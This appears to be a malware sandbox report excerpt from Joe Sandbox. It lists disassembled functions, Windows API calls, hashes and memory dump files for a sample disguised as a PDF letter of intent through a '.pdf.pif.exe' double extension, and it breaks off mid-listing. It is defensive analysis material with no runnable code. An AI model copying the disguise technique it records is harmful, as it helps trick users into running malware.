                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$CloseOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 167947723-0
                                                                                      • Opcode ID: c1da2739d9bde231cef35e57f1056c3b3f96b3bdf48c6ea5f9f3b0e529793344
                                                                                      • Instruction ID: 36971e80199c06dce7e432dda95045a67facb8c1c5e5d406bd4c985fc58d1439
                                                                                      • Opcode Fuzzy Hash: c1da2739d9bde231cef35e57f1056c3b3f96b3bdf48c6ea5f9f3b0e529793344
                                                                                      • Instruction Fuzzy Hash: 3DF08171A00205EBEB119FA5DE88ABF766CEF40355F10443EF145A61C0D6B85D419B29
                                                                                      Function 004023DE Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,0000015B,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3677997916-0
                                                                                      • Opcode ID: d25861fa117c27e6175a63c96e216350e97318d5e46bf3bab3a62b1bde6aa777
                                                                                      • Instruction ID: a158a5aacad5cf38e27217d247968545a00c68d90011b7c89b18f36f64d1e3ee
                                                                                      • Opcode Fuzzy Hash: d25861fa117c27e6175a63c96e216350e97318d5e46bf3bab3a62b1bde6aa777
                                                                                      • Instruction Fuzzy Hash: 4011A371910205EFDB10CFA0D6585AE77B4EF44355F20843FE042A72C0D6B84A85DB1A
                                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                                      • Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
                                                                                      • Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                                      • Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C
                                                                                      Function 004022D3 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,0000015B,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 849931509-0
                                                                                      • Opcode ID: 5caea05e084cfc9f65e50908e195c2f92d079df48506c859d5d77130795f88b9
                                                                                      • Instruction ID: 60dd4b3721a8f04ffc1309a236844118425adccc5ebdfff1779e58fd4e3c4786
                                                                                      • Opcode Fuzzy Hash: 5caea05e084cfc9f65e50908e195c2f92d079df48506c859d5d77130795f88b9
                                                                                      • Instruction Fuzzy Hash: 87F0AF72A00111EBD711BBA09A4EAAE7268DB44354F15403BF202B71C0D9FC5D428B6D
                                                                                      Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: 1bc76f76c076812a661ed8eaf952b51b3cf805c92e712603850dbdc01bd5ba8b
                                                                                      • Instruction ID: 3cc2cb9df621afe066920ca71bd623762fba7b494270894a4bdd1ee006784349
                                                                                      • Opcode Fuzzy Hash: 1bc76f76c076812a661ed8eaf952b51b3cf805c92e712603850dbdc01bd5ba8b
                                                                                      • Instruction Fuzzy Hash: 20E08C72700110CBCF11BBA4AB8859D7264EB9036AB1001BBE402F10D2CAB84C41DA2D
                                                                                      Function 004059CF Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                                      • Instruction ID: 1eb9dddf645dfc1e42ea27fadde30db719d7f554b9b2fef872a17e27e5e15d7e
                                                                                      • Opcode Fuzzy Hash: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                                      • Instruction Fuzzy Hash: C0D09E71654601EFEF098F20DE16F6EBBA2EB84B00F11952DB692940E0DA7158199B15
                                                                                      Function 10002814 Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 100028D3
                                                                                      • GetLastError.KERNEL32 ref: 100029DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocErrorLastVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 497505419-0
                                                                                      • Opcode ID: 7086f14c4ed73921c32663dd50e35cd757691b5a96ac4a6e5be154c5209038fc
                                                                                      • Instruction ID: 3fd83e1d41dfb8cbcb71a2ed35d47142bd90d8930b2c892e55557bfc521562a3
                                                                                      • Opcode Fuzzy Hash: 7086f14c4ed73921c32663dd50e35cd757691b5a96ac4a6e5be154c5209038fc
                                                                                      • Instruction Fuzzy Hash: E85183B9408215DFFB10DFA4DCC2B5937B4EB443D4F22846AEA08E721DDE34A881CB65
                                                                                      Function 0040268F Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004026A9
                                                                                        • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      • Opcode ID: d140ce9b72484ba706bc3fdae65e22226633a5cb8b1ee4d3bb39fe449e59706f
                                                                                      • Instruction ID: 2a3df283642b9b2654abe06b53b2e6533fcf73554f6d24b8753f4c964ab3cc6c
                                                                                      • Opcode Fuzzy Hash: d140ce9b72484ba706bc3fdae65e22226633a5cb8b1ee4d3bb39fe449e59706f
                                                                                      • Instruction Fuzzy Hash: EBE012B1B04116ABDB01AB95AE49DAE7B68DB01359B14403BF101F00D1C67949419B3D
                                                                                      Function 00402251 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                                                      • Instruction ID: 0b657d416b15e43c0193b3f865d343ab07691dd64d9d569c69532df3a91b5b61
                                                                                      • Opcode Fuzzy Hash: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                                                      • Instruction Fuzzy Hash: 82E0BF32A045696ADB2036F20E8D97F30589B54754F15057FB513BA1C2DDFC0D815AAD
                                                                                      Function 00403160 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F8B,000000FF,00000004,00000000,00000000,00000000), ref: 00403177
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                                                      • Instruction ID: 71aeb53177ba50d05d0cf1bc79962ee68b95cc51097d41dc468827112562ad25
                                                                                      • Opcode Fuzzy Hash: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                                                      • Instruction Fuzzy Hash: 88E08C32114218BBCF205FA19C04AE73F5CEB093A2F00C03ABD18E9290D234DA15DBE8
                                                                                      Function 00402BDA Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,0000015B,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                                      • Instruction ID: 3dbf039cb61568b40e8fd4d19fef357c16506d2f59f835c7eaccd1bdbf02c8de
                                                                                      • Opcode Fuzzy Hash: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                                      • Instruction Fuzzy Hash: A3E04676290108AFDB00EFA4EE4AFD93BECAB08704F008021B609E6091DA74F5408B6C
                                                                                      Function 10002739 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 10002757
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction ID: e6ccb02edab80a880d7c03d4c74031de7c2ff58f49d21229ec1755338f0ba737
                                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction Fuzzy Hash: 7DF09BF19497A1DEF350DF688C847063BE0E3883C4B03852AE3A8E6268EB344048CF19
                                                                                      Function 00402293 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString
                                                                                      • String ID:
                                                                                      • API String ID: 1096422788-0
                                                                                      • Opcode ID: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                                                      • Instruction ID: 032603440061492facc866799902dc36791b8dee2dcfc8dfbdbcdfe83c4889f9
                                                                                      • Opcode Fuzzy Hash: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                                                      • Instruction Fuzzy Hash: FCE0BF71940208BADB10AFA1CD49AED3A68EF01754F10443AF552BB0D1EAF995C1AB59
                                                                                      Function 00403FE1 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                                      • Instruction ID: d706231c2cc37d53405596eccba3c731e42e433def08e4c59de364e12d4351e7
                                                                                      • Opcode Fuzzy Hash: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                                      • Instruction Fuzzy Hash: 3EC09B757447017FEA108F609D47F1777687B64702F1844397640F50D0CBB4D510DA1C
                                                                                      Function 00403FCA Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
